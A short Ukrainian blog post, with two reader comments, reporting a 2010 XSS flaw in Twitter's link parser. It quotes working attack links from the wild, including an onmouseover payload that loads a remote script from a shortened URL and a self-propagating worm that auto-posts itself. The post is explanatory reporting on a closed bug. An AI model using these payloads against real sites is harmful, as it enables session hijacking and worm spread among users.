XSS на Twitter

Кілька годин тому на Twitter’і було знайдено і використано XSS-вразливість. Усе почалося з нешкідливого розфарбування твітів через ретвіт повідомлень @RainbowTwtr. Для використання XSS достатньо твітнути посилання виду http://twitter.com/example@"style="background-color:red"/. Пізніше з’явилися не такі невинні «забавки».

Парочка «твірусів», які я знайшов у своїй стрічці:
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#768;background:#054;/
Причина: поганий парсер посилань, який не має належної фільтрації.

У новому інтерфейсі Twiter’а XSS не працює.

На даний час можливість відправляти подібні посилання вже закрита, але вже написані твіти досі робочі.

коментарі:

+2magentoua 22.09.2010 05:46
Парсер лох :)
+1batsihor 25.09.2010 19:38
Сам іноді дивуююсь наскільки елементарні баги знаходять на таких відомих сайтах...

додати коментар: